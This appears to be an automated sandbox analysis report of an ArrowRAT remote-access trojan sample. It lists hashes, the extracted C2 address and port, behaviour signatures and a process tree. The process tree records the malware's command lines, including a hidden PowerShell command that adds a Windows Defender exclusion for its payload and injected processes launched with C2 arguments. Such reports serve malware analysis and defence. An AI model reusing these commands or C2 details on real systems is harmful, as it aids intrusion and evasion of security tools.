Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04-05-2023 12:31

General

  • Target
    arrow/3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe
  • Size
    138KB
  • MD5
    7da02064216481c00e88ca35db73c247
  • SHA1
    99983e91bc7511fcb650c31c26a33b581e242913
  • SHA256
    3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb
  • SHA512
    df61e4e5226cf035592ec464b68452507df4178edac853329cda8e0fe06102f8eae65bd9d7a6b68d835e2d7ef4ed3748ccd8bc1ed918eb2a85fb9788e5aafae6
  • SSDEEP
    3072:LbvJ5mz7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/YK:Lbv3S7BqjjYHdrqkL/

Malware Config

Extracted

  • Family
    arrowrat
  • Botnet
    9G7DXW
  • C2
    51.178.165.162:1338
  • Mutex
    Q2909Q

Signatures

  • ArrowRat
    Remote access tool with various capabilities first seen in late 2021.
  • Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
  • Modifies Installed Components in the registry (2 TTPs, 1 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoCs)
    Looks up country code configured in the registry, likely geofence.
  • Enumerates connected drives (3 TTPs, 1 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Suspicious use of SetThreadContext (1 IoCs)
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  • Checks SCSI registry key(s) (3 TTPs, 22 IoCs)
    SCSI information is often read in order to detect sandboxing environments.
  • Modifies registry class (41 IoCs)
  • Suspicious behavior: EnumeratesProcesses (7 IoCs)
  • Suspicious use of AdjustPrivilegeToken (30 IoCs)
  • Suspicious use of FindShellTrayWindow (49 IoCs)
  • Suspicious use of SendNotifyMessage (21 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (20 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\arrow\3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe
    "C:\Users\Admin\AppData\Local\Temp\arrow\3dbd1065734c9b3e603bc2a81dbadb77beeb54c6a918a6a4ae0687659ac3c0fb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2800
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
      2⤵
      PID:1084
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
      2⤵
      PID:4928
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 9G7DXW 51.178.165.162 1338 Q2909Q
      2⤵
      PID:4180
    • C:\Windows\System32\ComputerDefaults.exe
      "C:\Windows\System32\ComputerDefaults.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TX98E1\4RUF2A.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3348
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2244

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133277369508270428.txt
    Filesize: 75KB
    MD5: e3417e64fd17fa01c90cf956829ca7ff
    SHA1: f8960ede60ed71f3ca9f505556390518621393f6
    SHA256: a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c
    SHA512: 3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3wymvsu.uj3.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • memory/2244-177-0x000001EB64DE0000-0x000001EB64E00000-memory.dmp
    Filesize: 128KB
  • memory/2244-175-0x000001EB647D0000-0x000001EB647F0000-memory.dmp
    Filesize: 128KB
  • memory/2244-172-0x000001EB64A20000-0x000001EB64A40000-memory.dmp
    Filesize: 128KB
  • memory/2572-159-0x000002249D360000-0x000002249D370000-memory.dmp
    Filesize: 64KB
  • memory/2572-161-0x000002249D360000-0x000002249D370000-memory.dmp
    Filesize: 64KB
  • memory/2572-158-0x000002249D2E0000-0x000002249D302000-memory.dmp
    Filesize: 136KB
  • memory/2572-162-0x000002249D360000-0x000002249D370000-memory.dmp
    Filesize: 64KB
  • memory/2572-160-0x000002249D360000-0x000002249D370000-memory.dmp
    Filesize: 64KB
  • memory/2800-166-0x0000000002970000-0x0000000002971000-memory.dmp
    Filesize: 4KB
  • memory/4180-140-0x00000000055C0000-0x00000000055D0000-memory.dmp
    Filesize: 64KB
  • memory/4180-143-0x0000000005BD0000-0x0000000005C36000-memory.dmp
    Filesize: 408KB
  • memory/4180-146-0x0000000006480000-0x00000000064D0000-memory.dmp
    Filesize: 320KB
  • memory/4180-139-0x0000000005D80000-0x0000000006324000-memory.dmp
    Filesize: 5.6MB
  • memory/4180-137-0x0000000005450000-0x00000000054EC000-memory.dmp
    Filesize: 624KB
  • memory/4180-136-0x00000000053B0000-0x0000000005442000-memory.dmp
    Filesize: 584KB
  • memory/4180-134-0x0000000000400000-0x0000000000416000-memory.dmp
    Filesize: 88KB
  • memory/4180-311-0x00000000055C0000-0x00000000055D0000-memory.dmp
    Filesize: 64KB
  • memory/5076-133-0x00000199251C0000-0x00000199251E8000-memory.dmp
    Filesize: 160KB